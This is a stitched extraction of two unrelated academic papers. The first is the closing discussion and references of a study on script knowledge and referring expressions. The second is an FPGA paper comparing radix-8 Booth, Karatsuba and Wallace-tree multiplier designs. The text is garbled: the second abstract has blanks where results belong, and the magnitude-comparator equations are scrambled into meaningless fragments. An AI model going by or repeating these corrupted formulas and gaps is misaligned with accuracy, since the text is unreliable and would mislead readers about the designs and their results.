significant effect of surprisal on RE type for their data. In order to replicate their settings as closely as possible, we also included residualEntropy as a predictor in our model (see last predictor in Table 5); however, this did not change the results. 6 Discussion and Future Work Our study on incrementally predicting discourse referents showed that script knowledge is a highly important factor in determining human discourse ex- pectations. Crucially, the computational modelling approach allowed us to tease apart the different fac- tors that affect human prediction as we cannot ma- nipulate this in humans directly (by asking them to “switch off” their common-sense knowledge). By modelling common-sense knowledge in terms of event sequences and event participants, our model captures many more long-range dependencies than normal language models. The script knowledge is automatically induced by our model from crowd- sourced scenario-specific text collections. In a second study, we set out to test the hypoth- esis that uniform information density affects refer- ring expression type. This question is highly con- troversial in the literature: while Tily and Piantadosi (2009) find a significant effect of surprisal on refer- ring expression type in a corpus study very similar to ours, other studies that use a more tightly con- trolled experimental approach have not found an ef- fect of predictability on RE type (Stevenson et al., 1994; Fukumura and van Gompel, 2010; Rohde and Kehler, 2014). The present study, while replicating exactly the setting of T&P in terms of features and analysis, did not find support for a UID effect on RE type. 
The difference in results between T&P 2009 and our results could be due to the different corpora and text sorts that were used; specifically, we would expect that larger predictability effects might be ob- servable at script boundaries, rather than within a script, as is the case in our stories. A next step in moving our participant predic- tion model towards NLP applications would be to replicate our modelling results on automatic text- to-script mapping instead of gold-standard data as done here (in order to approximate human level of processing). Furthermore, we aim to move to more complex text types that include reference to several scripts. We plan to consider the recently published ROC Stories corpus (Mostafazadeh et al., 2016), a large crowdsourced collection of topically unre- stricted short and simple narratives, as a basis for these next steps in our research. 42 Acknowledgments We thank the editors and the anonymous review- ers for their insightful suggestions. We would like to thank Florian Pusse for helping with the Ama- zon Mechanical Turk experiment. We would also like to thank Simon Ostermann and Tatjana Anikina for helping with the InScript corpus. This research was partially supported by the German Research Foundation (DFG) as part of SFB 1102 ‘Informa- tion Density and Linguistic Encoding’, European Research Council (ERC) as part of ERC Starting Grant BroadSem (#678254), the Dutch National Sci- ence Foundation as part of NWO VIDI 639.022.518, and the DFG once again as part of the MMCI Cluster of Excellence (EXC 284). References Simon Ahrendt and Vera Demberg. 2016. Improving event prediction by representing script participants. In Proceedings of NAACL-HLT. Jennifer E. Arnold. 2001. The effect of thematic roles on pronoun use and frequency of reference continuation. Discourse Processes, 31(2):137–162. Marco Baroni and Alessandro Lenci. 2010. Distribu- tional memory: A general framework for corpus-based semantics. Computational Linguistics, 36(4):673– 721. Marco Baroni, Georgiana Dinu, and Germán Kruszewski. 2014. Don’t count, predict! A systematic compari- son of context-counting vs. context-predicting seman- tic vectors. In Proceedings of ACL. Antoine Bordes, Nicolas Usunier, Alberto Garcia-Duran, Jason Weston, and Oksana Yakhnenko. 2013. Trans- lating embeddings for modeling multi-relational data. In Proceedings of NIPS. Jan A. Botha and Phil Blunsom. 2014. Compositional morphology for word representations and language modelling. In Proceedings of ICML. Richard H. Byrd, Peihuang Lu, Jorge Nocedal, and Ciyou Zhu. 1995. A limited memory algorithm for bound constrained optimization. SIAM Journal on Scientific Computing, 16(5):1190–1208. Nathanael Chambers and Daniel Jurafsky. 2008. Unsu- pervised learning of narrative event chains. In Pro- ceedings of ACL. Nathanael Chambers and Dan Jurafsky. 2009. Unsuper- vised learning of narrative schemas and their partici- pants. In Proceedings of ACL. Brian S. Everitt. 1992. The analysis of contingency ta- bles. CRC Press. Lea Frermann, Ivan Titov, and Manfred Pinkal. 2014. A hierarchical Bayesian model for unsupervised induc- tion of script knowledge. In Proceedings of EACL. Kumiko Fukumura and Roger P. G. van Gompel. 2010. Choosing anaphoric expressions: Do people take into account likelihood of reference? Journal of Memory and Language, 62(1):52–66. T. Florian Jaeger, Esteban Buz, Eva M. Fernandez, and Helen S. Cairns. 2016. Signal reduction and linguis- tic encoding. Handbook of psycholinguistics. Wiley- Blackwell. T. 
Florian Jaeger. 2010. Redundancy and reduction: Speakers manage syntactic information density. Cog- nitive psychology, 61(1):23–62. Bram Jans, Steven Bethard, Ivan Vulić, and Marie Francine Moens. 2012. Skip n-grams and ranking functions for predicting script events. In Proceedings of EACL. Gina R. Kuperberg and T. Florian Jaeger. 2016. What do we mean by prediction in language comprehension? Language, cognition and neuroscience, 31(1):32–59. Gina R. Kuperberg. 2016. Separate streams or proba- bilistic inference? What the N400 can tell us about the comprehension of events. Language, Cognition and Neuroscience, 31(5):602–616. Marta Kutas, Katherine A. DeLong, and Nathaniel J. Smith. 2011. A look around at what lies ahead: Pre- diction and predictability in language processing. Pre- dictions in the brain: Using our past to generate a fu- ture. Tomas Mikolov, Martin Karafiát, Lukas Burget, Jan Cer- nockỳ, and Sanjeev Khudanpur. 2010. Recurrent neu- ral network based language model. In Proceedings of Interspeech. Tomas Mikolov, Stefan Kombrink, Anoop Deoras, Lukar Burget, and Jan Cernocky. 2011. RNNLM-recurrent neural network language modeling toolkit. In Pro- ceedings of the 2011 ASRU Workshop. Tomas Mikolov, Ilya Sutskever, Kai Chen, Greg S. Cor- rado, and Jeff Dean. 2013. Distributed representations of words and phrases and their compositionality. In Proceedings of NIPS. Ashutosh Modi and Ivan Titov. 2014. Inducing neural models of script knowledge. Proceedings of CoNLL. Ashutosh Modi, Tatjana Anikina, Simon Ostermann, and Manfred Pinkal. 2016. Inscript: Narrative texts anno- tated with script information. Proceedings of LREC. Ashutosh Modi. 2016. Event embeddings for semantic script modeling. Proceedings of CoNLL. Nasrin Mostafazadeh, Nathanael Chambers, Xiaodong He, Devi Parikh, Dhruv Batra, Lucy Vanderwende, Pushmeet Kohli, and James Allen. 2016. A corpus and cloze evaluation for deeper understanding of com- monsense stories. Proceedings of NAACL. 43 Haoruo Peng, Daniel Khashabi, and Dan Roth. 2015. Solving hard coreference problems. In Proceedings of NAACL. Karl Pichotta and Raymond J Mooney. 2014. Statistical script learning with multi-argument events. Proceed- ings of EACL. Altaf Rahman and Vincent Ng. 2012. Resolving com- plex cases of definite pronouns: the Winograd schema challenge. In Proceedings of EMNLP. Michaela Regneri, Alexander Koller, and Manfred Pinkal. 2010. Learning script knowledge with web experiments. In Proceedings of ACL. Hannah Rohde and Andrew Kehler. 2014. Grammati- cal and information-structural influences on pronoun production. Language, Cognition and Neuroscience, 29(8):912–927. Rachel Rudinger, Vera Demberg, Ashutosh Modi, Ben- jamin Van Durme, and Manfred Pinkal. 2015. Learn- ing to predict script events from domain-specific text. Proceedings of the International Conference on Lexi- cal and Computational Semantics (*SEM 2015). Asad Sayeed, Clayton Greenberg, and Vera Demberg. 2016. Thematic fit evaluation: an aspect of selectional preferences. In Proceedings of the Workshop on Eval- uating Vector Space Representations for NLP (RepE- val2016). Roger C. Schank and Robert P. Abelson. 1977. Scripts, Plans, Goals, and Understanding. Lawrence Erlbaum Associates, Potomac, Maryland. Simone Schütz-Bosbach and Wolfgang Prinz. 2007. Prospective coding in event representation. Cognitive processing, 8(2):93–102. Rosemary J. Stevenson, Rosalind A. Crawley, and David Kleinman. 1994. Thematic roles, focus and the rep- resentation of events. 
Language and Cognitive Pro- cesses, 9(4):519–548. Harry Tily and Steven Piantadosi. 2009. Refer effi- ciently: Use less informative expressions for more pre- dictable meanings. In Proceedings of the workshop on the production of referring expressions: Bridging the gap between computational and empirical approaches to reference. Alessandra Zarcone, Marten van Schijndel, Jorrig Vo- gels, and Vera Demberg. 2016. Salience and atten- tion in surprisal-based accounts of language process- ing. Frontiers in Psychology, 7:844. 44 work_2edq4sbs6readbovfgzcxl5ojy ---- International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 15 Radix-8 Design Alternatives of Fast Two Operands Interleaved Multiplication with Enhanced Architecture With FPGA implementation & synthesize of 64-bit Wallace Tree CSA based Radix-8 Booth Multiplier Mohammad M. Asad King Faisal University, Department of Electrical Engineering, Ahsa 31982, Saudi Arabia e-mail: asadmosab@gmail.com Ibrahim Marouf King Faisal University, Department of Electrical Engineering, Ahsa 31982, Saudi Arabia e-mail: i.marouf@outlook.com Qasem Abu Al-Haija Department of Computer Information and Systems Engineering Tennessee State University, Nashville, USA e-mail: qabualha@my.tnstate.edu Abstract—In this paper, we proposed different comparable reconfigurable hardware implementations for the radix-8 fast two operands multiplier coprocessor using Karatsuba method and Booth recording method by employing carry save (CSA) and kogge stone adders (KSA) on Wallace tree organization. The proposed designs utilized family with target chip device along with simulation package. Also, the proposed designs were synthesized and benchmarked in terms of the maximum operational frequency, the total path delay, the total design area and the total thermal power dissipation. The experimental results revealed that the best multiplication architecture was belonging to Wallace Tree CSA based Radix- 8 Booth multiplier ( ) which recorded: critical path delay of , maximum operational frequency of , hardware design area (number of logic elements) of , and total thermal power dissipation estimated as . Consequently, method can be efficiently employed to enhance the speed of computation for many multiplication based applications such embedded system designs for public key cryptography. Keywords-Cryptography; Computer Arithmetic; FPGA Design; Hardware Synthesis; Kogge-Stone Adder (KSA); Radix- 8 Booth Recording; Karatsuba Multiplier; Wallace Tree I. INTRODUCTION Recently, the vast promotion in the field of information and communication technology (ICT) such as grid and fog computing has increased the inclination of having secret data sharing over the existing non- secure communication networks. This encouraged the researches to propose different solutions to ensure the safe access and store of private and sensitive data by employing different cryptographic algorithms especially the public key algorithms [1] which proved robust security resistance against most of the attacks and security halls. Public key cryptography is significantly based on the use of number theory and digital arithmetic algorithms. Indeed, wide range of public key cryptographic systems were developed and embedded using hardware modules due to its better performance and security. 
This increased the demand on the embedded and System-on-Chip (SoC) [2] technologies employing several computer-aided design (CAD) tools along with configurable hardware processing units such as field programmable gate arrays (FPGA) and application specific integrated circuits (ASIC). Therefore, a considerable number of embedded coprocessor designs were used to replace software-based (i.e. programming-based) solutions of different applications such as image processors, cryptographic processors, digital filters, low-power applications such as [3], and others. The major part of designing such processors significantly encompasses the use of computer arithmetic techniques in the underlying layers of processing.

Computer arithmetic [4], or digital arithmetic, is the science that combines mathematics with computer engineering and deals with representing integers and real values in digital systems and with efficient algorithms for manipulating such numbers by means of hardware circuitry and software routines. Arithmetic operations on pairs of numbers x and y include addition (x + y), subtraction (x – y), multiplication (x × y), and division (x / y). Subtraction and division can be viewed as operations that undo the effects of addition and multiplication, respectively. Multiplication is considered a core operation that affects the performance of any embedded system. Therefore, the use of fast multiplier units will result in enhancements in the overall performance of the system.

Recently, several solutions were proposed for multiplication algorithms, while only a few of them were efficient [5]. A multiplication algorithm [6] is a method to find the product of two numbers, i.e. x × y. Multiplication is an essential building block for several digital processors as it requires a considerable amount of processing time and hardware resources. Depending on the size of the numbers, different algorithms are in use. The elementary-school grade algorithm multiplies each number digit by digit, producing partial sums, with a complexity of O(n²) [5]. For larger numbers, more efficient algorithms are needed. For example, if the integers to be multiplied are 1k bits long, the schoolbook method requires on the order of n² ≈ 10⁶ single-digit multiplications. However, more efficient and practical multiplication algorithms will be discussed in the following subsections.

In this paper, we report on several fast alternative designs for the Radix-8 based multiplier unit including: Radix-8 CSA Based Booth Multiplier; CSA Based Radix-8 Booth, Wallace Tree Karatsuba Multiplier; CSA Based Radix-8 Booth, KSA Based Karatsuba Multiplier; CSA Based Radix-8 Booth, With Comparator Karatsuba Multiplier; Sequential 64-Bit CSA Based Radix-8 Booth Multiplier; and 64-bit Wallace Tree CSA based Radix-8 Booth multiplier (WCBM). The remainder of this paper is organized as follows: Section 2 discusses the core components of efficient multiplier design, Section 3 provides the proposed design alternatives of the Radix-8 based multiplier, Section 4 presents the synthesizing results and analysis, and, finally, Section 5 concludes the paper.

II. CORE DESIGN COMPONENTS-REVIEW

Two-operands multiplication is a substantial arithmetic operation since it plays a major role in the design of many embedded and digital signal processors [7]. Therefore, the efficient design and implementation of a fast multiplier unit is on demand.
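To make the quadratic cost of the elementary-school method concrete, the following short Python sketch multiplies two numbers given as digit lists; the nested loops perform one single-digit multiplication per digit pair, i.e. n² of them for two n-digit operands. The digit-list representation (least-significant digit first) is only an illustrative assumption.

```python
def schoolbook_multiply(x_digits, y_digits, base=10):
    """Grade-school multiplication of two numbers given as digit lists
    (least-significant digit first). Every digit of x is multiplied by
    every digit of y, so an n-digit by n-digit product costs n*n
    single-digit multiplications -- the O(n^2) behaviour noted above."""
    result = [0] * (len(x_digits) + len(y_digits))
    for i, xd in enumerate(x_digits):
        carry = 0
        for j, yd in enumerate(y_digits):
            tmp = result[i + j] + xd * yd + carry
            result[i + j] = tmp % base
            carry = tmp // base
        result[i + len(y_digits)] += carry
    return result

# 123 * 456 = 56088 (digits stored least-significant first)
print(schoolbook_multiply([3, 2, 1], [6, 5, 4]))  # [8, 8, 0, 6, 5, 0]
```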
In this paper, we propose a competitive reconfigurable multiplier design using scalable and efficient modules. Thus, the following subsections review the core design components for the proposed multiplier implementation unit.

Figure 1. Carry save Adder: (a) Top View Design (b) Internal Architecture

A. Carry Save Adder (CSA)

CSA [4] is a fast redundant adder with a constant carry path delay regardless of the number of operands' bits. It produces the result as two vectors: a sum vector (or partial sum) and a carry vector (or partial carry). The advantage of CSA is that the speed is constant regardless of the number of bits. However, its area increases linearly with the number of bits. The top view of the CSA unit along with its internal logic design architecture are provided in Fig. 1.

In this work, we have implemented the CSA adder using VHDL code for different bit sizes ranging from 8 bits through 64 bits [8]. The synthesis results of total delay in nanoseconds (ns) and area in Logic Elements (LEs) were analyzed and reported in [8], and they are illustrated in Fig. 2. These results were generated using the software package [9], simulated for the target device model [10], and they highly conform to the theoretical evaluation of CSA operation since the delay time is almost equal for all bit sizes. However, the area almost doubles as the bit width doubles. Also, the timing estimation of CSA was generated via the Time Analyzer tool provided in the package. Accordingly, the critical path delay is the data arrival time, while the data delay is only 2.866 ns, which provides a frequency of approximately 349 MHz. Finally, to verify the performance of CSA, we have compared it with the well-known Carry Lookahead Adder (CLA) in terms of area and delay. CLA is a carry propagation adder (CPA) with a logarithmic relation between the carry propagation delay and the number of bits in the operands.

Figure 2. Delay-Area analysis of CSA vs CLA implementations (8–64 bit)

The simulation results of both CSA and CLA, provided in Fig. 2, show that CSA is superior in both area and speed. It has an almost constant time delay and relatively less area than CLA, whereas the CLA time delay increases as the number of bits increases, though not as much as the area does.

B. Kogge-Stone Adder (KSA)

KSA is a fast two-operands parallel prefix adder (PPA) [11] that executes addition in a parallelized manner. PPAs are just like CLA but with an enhancement in the carry propagation stage (called the middle stage). There are five different variations of PPAs, namely: Ladner-Fischer Adder (LFA), Brent-Kung Adder (BKA), Kogge-Stone Adder (KSA), Han-Carlson Adder (HCA), and Sklansky Adder (SkA). These adders differ by the tree structure design to optimize certain aspects such as performance, power, area size, and fan in/out.

To verify the performance of all PPAs, we have implemented them on FPGA, and the experimental results [6] showed that KSA utilizes a larger area to achieve higher performance compared with the other PPAs. Thus, we decided to consider KSA as our basic carry propagation adder (CPA) to finalize the redundant results and to build up many other units that need a conventional adder. In short, the simulation results of [6] showed that KSA leads the other adders as it has the smallest time delay with only 4.504 ns. This result is very useful and conforms to the theoretical modeling of KSA, which has the least number of logic levels.
Aligning Partial Products. E. Magnitude Comparator The magnitude (or digital) comparator is a hardware electronic device that takes two numbers as input in binary form and determines whether one number is greater than, less than or equal to the other number. Like that in binary addition, the efficient comparator can be implemented using G (generate) and P (propagate) signal for comparison. Basically, the comparator involves two 2-bits: & can be realized by: 1 1 1 1 0 0 ( ).( ) Big B A B A B A B   (1) 1 1 0 0 EQ ( ).( )A B A B   (2) For AB, “BBig, EQ” is “0,0”. Where BBig is defined as output A less than B (A_LT_B).Comparing Eq. (1) and (2) with carry signal (3): ( ). . out in in C AB A B C G P C     (3) Where A & B are binary inputs Cin is carry input, Cout is carry output, and G & P are generate & propagate signals, respectively. Now, after comparing equations (1) & (3), we got: 1 1 1 G A B , 1 1 1 ( )EQ A B  , 0 0in C A B (4) Cin can be considered as G0. For this, encoding equation is given as: [ ] [ ] [ ]i i i G A B (5) [ ] [ ] [ ] ( ) i i i EQ A B  (6) Substituting the two values from equations (5) & (6) in (1) & (2) results in: [2 j 1:2 j] [2 j 1] [2 j 1] [2 ] . Big j B G EQ G      (7) [2 j 1:2 ] [2 j 1] [2 j] . j EQ EQ EQ    (8) & signals can be further combined to form group & signals. For instance, for 64-bit comparator, & can be computed as: 6362 [63:0] 63 0 1 . Big k m k m k B G G EQ              (9) 63 [63:0] 0 m m EQ EQ   (10) Fig 7. Shows the complete design of an 8-bit comparator as an example of this techniques where: i= 0…7, j = 0…3. III. PROPOSED MULTIPLIER DESIGN ALTERNATIVES Fundamentally, multiplication operation (along with fast addition) is a significant unit in almost all cryptographic coprocessors. For instance, in the design of SSC Crypto-processor[15], the multiplication primarily used to compute the square parameter the public key ( and the modulus ( . Also, in the design of RSA Crypto-processor, the multiplier is used to compute the modulus ( and the Euler function [16]. One more example, is the need for fast multipliers at several computation stages of ECC cryptosystem [17]. Indeed, wide range of methods have been proposed to address the efficient design of fast two operands arithmetic International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 20 multiplier. In this paper, we have spent an extensive time to design an efficient multiplier by trying several variations of different multiplier design specifications. The first design was the implementation of Radix-8 Booth Encoding Multiplier. Then, we tried many variations to employ this multiplier with different design methods. In the next subsections, we provide six design alternatives of the proposed multiplier to come up with the most cost-effective multiplier design. We finally report on the final implemented design. Figure 7. The complete design of8- Bit Comparatorincluding Pre- Encoding circuit and Comp circuit A. Radix-8 CSA Based Booth Multiplier Unlike Binary radix booth encoder, Radix-8 booth encodes each group of three bits as shown in table 1. The encoding technique uses shift operation to produce 2A and 4A while 3A is equal to 2A+A. The logic diagram of implementing CSA based Radix-8 booth multiplier is shown in Fig. 8. The use of CSA provides very powerful performance with limited area cost. The partial products for radix-2 is n (where n is the number of operand bits). 
The number of partial products for radix-2 is n (where n is the number of operand bits); for radix-8, however, it is only n/3.
TABLE I. RADIX-8 BOOTH ENCODING.
Inputs (bits of the M-bit multiplier) | Partial product PPRi
0 0 0 0 | 0
0 0 0 1 | A
0 0 1 0 | A
0 0 1 1 | 2A
0 1 0 0 | 2A
0 1 0 1 | 3A
0 1 1 0 | 3A
0 1 1 1 | 4A
1 0 0 0 | -4A
1 0 0 1 | -3A
1 0 1 0 | -3A
1 0 1 1 | -2A
1 1 0 0 | -2A
1 1 0 1 | -A
1 1 1 0 | -A
1 1 1 1 | 0
As can be seen from Fig. 8, the multiplier accepts two 32-bit operands and stores one of them in a shift register, from which the bit groups used in the encoding are selected, whereas the other operand is processed by the Booth encoder. The output of the encoding stage is added via the sequential CSA adder and the result is provided in a redundant representation (vector sum and vector carry).
Figure 8. Design of the Radix-8 Booth 32-bit multiplier
Figure 9. State machine diagram for the 32-bit Booth multiplier.
Fig. 9 illustrates the FSM diagram of the 32-bit Booth multiplier. It starts with Reset_State, where all signals and variables are cleared (i.e. reset). The next state is Mul_Gen, where the encoding occurs. After that, the generated vector is added to the previous results in the CSA state. Fourth, the results are stored in Store_State and the machine moves back to the Mul_Gen state in a loop until all the bits have been selected and encoded. Finally, the output results are provided in the Output state. Note that in radix-8 encoding the number of generated partial product vectors is computed by dividing the number of bits by 3, since three bits are selected and used for each encoding step.
B. CSA Based Radix-8 Booth, Wallace Tree Karatsuba Multiplier
In this method, we combine the benefits of the bit reduction of radix-8 Booth with the parallelism of the CSA based Wallace tree as well as the pipelining process of Karatsuba multiplication. Thus, this design achieved minimum path delay and minimized area (i.e. the best performance). However, redundancy in this design produced one critical problem regarding the middle carry at the edges of blocks that affects the results. Fig. 10 illustrates the flow diagram for this design. Here, we first designed a 64-bit Karatsuba multiplier using a 32-bit CSA based radix-8 Booth multiplier for the partial product calculation (since we are implementing a 64-bit multiplier, the block size m was chosen to be 32 bits, i.e. half size). First, the two entered operands are divided into halves. Next, the halves are fed into the Booth multiplier to compute the partial products given by the Karatsuba formula. Since the results are redundant and there are five partial products according to the Karatsuba alignment, 10 partial product vectors are generated. In the final stage, a CSA based Wallace tree was implemented to add the resulting partial products. The final result is represented redundantly as a vector sum and a vector carry. This design achieves minimum path delay with limited area. However, redundancy in this design produces one critical problem that affects the results. As a rule of thumb, if we multiply two numbers (i.e. p and q), the width of the result grows to the sum of the operand widths. However, this is not the case when using redundant systems: the result is stored as two vectors, and adding the two vectors to obtain the conventional product might produce one extra carry bit. This additional bit brings up a new problem in the preliminary design.
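Before turning to the fixes discussed next, a small numerical sketch of this extra-bit effect may help. The two vectors below are contrived stand-ins for the redundant (vector sum, vector carry) pair: the pair only has to equal the product modulo 2^64, for example when negative Booth multiples travel through the 64-bit datapath in two's complement, so their plain sum can spill into a 65th bit even though the product itself fits in 64 bits.

```python
MASK64 = (1 << 64) - 1

# a 32x32-bit multiplication, so the true product fits in 64 bits
a, x = 0x9234_5678, 0x7ABC_DEF1
true_product = a * x

# contrived (vector sum, vector carry) pair: equal to the product only modulo 2^64,
# e.g. because a negative Booth multiple is kept in 64-bit two's complement
vec_sum = (true_product + 3 * a) & MASK64
vec_carry = (-3 * a) & MASK64

converted = vec_sum + vec_carry              # final carry-propagate addition
print(hex(converted))                        # 65 bits: one extra 'mid' carry appears
assert converted != true_product
assert converted & MASK64 == true_product    # discarding bit 64 recovers the product
```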
Now, this problem can be solved by discarding the last carry when converting back to the conventional representation. However, in the Karatsuba algorithm the numbers are split into 32-bit halves (the original size is 64 bits). The result must be 128 bits, but in the Karatsuba case it is formed by 10 partial product vectors of 64 bits, shifted in such a way that adding those vectors results in 128 bits. Thus, discarding all the generated carries when converting back to the conventional system leads to an error, since only the carry generated by adding the two vectors that correspond to the same variable (i.e. the same partial product) needs to be discarded. The other generated carries must be considered. Fig. 11 demonstrates this problem graphically.
Figure 10. Design of the 64-bit CSA Based Radix-8 Booth, Wallace Tree Karatsuba multiplier.
Figure 11. Graphical approach to demonstrate the carry error (the mid-carry problem); here we have two cases: Case I - ps1 + pc1 might result in a carry, result = 65 bits (wrong), the carry must be discarded; Case II - ps1 + ps2 might result in a carry, result = 65 bits (correct), the carry must be considered.
Eventually, the mid-carry problem was solved either by using the 64-bit CSA Based Radix-8 Booth, KSA Based Karatsuba multiplier or by using the 64-bit CSA Based Radix-8 Booth, with Comparator Karatsuba multiplier. However, both solutions added more overhead to the design cost; therefore, this solution was excluded. Both solutions are discussed in the following subsections.
1) CSA Based Radix-8 Booth, KSA Based Karatsuba Multiplier.
Since the carry to be eliminated is the one generated by the Booth multiplier, a first thought is to exchange the CSA adder with a KSA adder in order to convert the two vectors back into one 64-bit number and discard any generated carry. All the 8 vectors are reduced into five 64-bit vectors in parallel. This stage helps to eliminate the false carry without the need for any further examination. KSA is a fast adder, thus this design maintains its high performance while utilizing more logic elements. The logic diagram of the design is shown in Fig. 12.
2) CSA Based Radix-8 Booth, with Comparator Karatsuba Multiplier.
Another notable design option that can solve the mid-carry problem is to use a 64-bit comparator to test whether the two vectors will generate a carry; if yes, a correction step is performed before the 10 vectors are input to the CSA tree. After the Booth multiplication stage, the vector sum and vector carry that may produce a carry error are connected to the inputs of the 64-bit comparator unit, and a correction is performed if needed. Finally, all vectors are added using the CSA tree. The complete solution is depicted in Fig. 13.
Figure 12. Design of the 64-bit CSA Based Radix-8 Booth, KSA Based Karatsuba multiplier.
Figure 13. Karatsuba multiplication based on CSA and comparator.
Note that the 64-bit comparator can be built with 8 stages in total, recording a total delay of 13 gate levels and an area of 317 gates (like the design of the 8-bit comparator discussed in Section 2.5). To predict whether the carry will be generated or not, we need to generate 64-bit G (generate) and K (kill) vectors. Thus, there are three cases which might happen, as follows:
- Case I: when the most significant bit position is a propagate state (G = K = 0), the carry is propagated. Here we need to determine the first non-propagate state below it. If that state is a kill state, then the vector does not need any correction. But if it is a generate state, then we need to subtract one from the highest bit (MSB) of either vector to prevent the carry from propagating out.
- Case II: when the most significant bit position is a kill state, no correction is needed.
- Case III: when the most significant bit position is a generate state, a correction is needed. If this happens at the highest bit (MSB) itself, it needs to subtract two ones; but if it occurs below a run of propagate states, then this is Case I.
To determine the first state, we have used a comparator to compare the two vectors, with the comparator results read as follows:
- G > K: a generate state happened first, or it is the first state after the propagation run.
- G < K: a kill state happened first, or it is the first state after the propagation run.
- G = K: all states are propagate states, and no correction is needed because we do not have an input carry.
3) Comparisons between Design II & Design III
We investigated both proposed design alternatives of Karatsuba based multiplication theoretically in terms of critical path delay (in gate delay units) and the area of the multiplier (how many gates are used in the implementation). The results are shown in Table 2 below.
TABLE II. COMPARISON BETWEEN DESIGN II & DESIGN III.
Design solution | Delay (gate delays) | Delay optimization | Area (# of gates) | Area optimization
Solution I: using KSA adder | 23 | +15% | 6130 | -
Solution II: using Comparator unit | 27 | - | 3712 | +50%
C. Sequential 64-Bit CSA Based Radix-8 Booth Multiplier
This design is accomplished by expanding the 32-bit Booth multiplier to 64 bits. The two modules (i.e. the 64-bit and the 32-bit Booth) differ only in the number of generated partial products. Since radix-8 is used, 22 partial products are generated in the new module instead of 11, while the other logic components remain the same. Fig. 14 shows the logic diagram of the new 64-bit implementation. This design was implemented and simulated on an Altera FPGA kit, recording a path delay of 10.701 ns for one loop; since the program runs 22 times (i.e. 22 partial products), the total path delay is 235.422 ns. Also, this multiplier requires 3330 logic elements (LEs).
Figure 14. Design of the CSA based Radix-8 Booth 64-bit multiplier.
IV. SYNTHESIZE RESULTS AND ANALYSIS
To speed up the performance of the sequential 64-bit CSA Based Radix-8 Booth Multiplier, we parallelized the addition of the partial products produced in the same level by using a Wallace CSA tree instead of the sequential CSA, to exploit the maximum possible parallelism between the partial products, gain in speed and enhance the design performance.
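The sketch below illustrates, in Python, the kind of carry-save tree reduction referred to here: a list of addends is repeatedly compressed three at a time into sum/carry pairs until only two vectors remain, which a single fast adder (such as the KSA) then combines. It is an algorithmic illustration only; operand widths and the final addition are simplified with respect to the FPGA design.

```python
def csa(a, b, c):
    """Carry-save (3:2) compression: three addends in, a (sum, carry) pair out."""
    return a ^ b ^ c, ((a & b) | (a & c) | (b & c)) << 1

def wallace_reduce(operands):
    """Reduce a list of addends to two vectors with layers of 3:2 compressors."""
    ops = list(operands)
    while len(ops) > 2:
        nxt = []
        take = len(ops) - len(ops) % 3          # how many addends form groups of three
        for i in range(0, take, 3):
            s, c = csa(ops[i], ops[i + 1], ops[i + 2])
            nxt += [s, c]
        nxt += ops[take:]                       # 0, 1 or 2 leftovers pass through
        ops = nxt
    return ops                                  # two vectors remain

partial_products = [17, 4096, 33, 900, 12345, 7, 65536, 2, 999, 314]  # 10 addends
s_vec, c_vec = wallace_reduce(partial_products)
assert s_vec + c_vec == sum(partial_products)   # a carry-propagate adder (e.g. KSA) finishes
```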
With that, we end up implementing a 64-bit Wallace Tree CSA based Radix-8 Booth multiplier (WCBM). The block diagram of the proposed design is shown in Fig. 15(a). The comparison with the other design alternatives showed that the Wallace Tree CSA Based Radix-8 Booth Multiplier (WCBM) decreased the total delay and increased the operational speed of the multiplication operation. Also, the design was modified to increase the frequency by dividing the program into three main states. The top view of our implemented WCBM unit is given in Fig. 15(b). The WCBM unit is triggered by the CLK signal along with an enable line. The generated number can be obtained from the output port lines "sum", which is 128 bits wide. Besides, the unit encompasses three control input signals (enable, reset, clk) and two control output signals (Ack and Ready). Moreover, the finite state machine (FSM) diagram for the implemented WCBM is shown in Fig. 15(c). The FSM consists of three main phases: partial product generation (initially, 22 partial products are generated by using radix-8 Booth encoding), the Wallace tree phase (these partial products are added by using a 7-level CSA based Wallace tree) and the KSA phase (because the result is redundant, a KSA is used in the last phase to convert it to the conventional result). Finally, Fig. 16 illustrates a sample numerical example of the proposed WCBM generated with the Quartus II simulation tool.
Figure 15. (a) Design architecture of WCBM (b) Top level diagram of WCBM (c) FSM diagram for WCBM.
Figure 16. Sample run example of the WCBM processing two 64-bit numbers
The proposed multiplier implementation has been synthesized using an Altera Cyclone EP4CGX-22CF19C7 FPGA kit to analyze several design factors such as the design area, the total delay of the multiplication unit and the thermal power consumption of the FPGA implementation. We have evaluated the performance of the 64-bit Wallace Tree CSA based Radix-8 Booth multiplier (WCBM) module for different data path sizes. The timing analysis of the critical clock cycle for the implemented WCBM is illustrated in Fig. 17. It can be seen from the graph that the critical path delay is 14.103 ns, of which 3.094 ns is clock delay and 11.009 ns is data delay. This gives a maximum frequency for the circuit of 90.83 MHz. In addition, the area of the design recorded a constant number of logic elements (i.e. 14249 LEs), with a total thermal power dissipation, estimated using the PowerPlay Power Analyzer tool of the Quartus II software, of 217.56 mW.
Figure 17. Waveform sample of the proposed WCBM data delay
V. CONCLUSIONS AND REMARKS
Multiplication is a core operation that dominates the performance of several public-key cryptographic algorithms such as RSA and SSC. In this paper, we have thoroughly discussed several design alternatives for a radix-8 based multiplier unit by employing the Karatsuba method and the Booth recoding method with carry-save and Kogge-Stone adders on a Wallace tree organization. The proposed designs were evaluated in terms of many aspects including: maximum frequency and critical path delay, design area, and the total FPGA power consumption.
The proposed hardware cryptosystem design was carried out using Altera Cyclone FPGA design technology along with the help of Altera CAD packages such as Quartus II and ModelSim 10.1. To sum up, we have successfully implemented and synthesized the Wallace Tree CSA Based Radix-8 Booth Multiplier (WCBM) module via the target FPGA technology for 64 bits. The synthesizer results showed attractive results in terms of several design factors that can improve the computation performance for many multiplication-based applications.
REFERENCES
[1] A.J. Menezes, P.C. Van Oorschot and S.A. Vanstone. (1996). "Handbook of Applied Cryptography", CRC Press, Boca Raton, Florida.
[2] K. Javeed, X. Wang and M. Wang, 'Serial and Parallel Interleaved Modular Multipliers on FPGA Platform', IEEE 25th International Conference on Field Programmable Logic and Applications (FPL), 2015. https://doi.org/10.1109/FPL.2015.7293986
[3] D. J. Greaves, System on Chip Design and Modelling, University of Cambridge, Computer Laboratory, Lecture Notes, 2011. http://www.cl.cam.ac.uk/teaching/1011/SysOnChip/socdam-notes1011.pdf
[4] M. D. Ercegovac and T. Lang, (2004) 'Digital Arithmetic', Morgan Kaufmann Publishers, Elsevier, vol. 1, pp. 51-136. http://www.sciencedirect.com/science/book/9781558607989
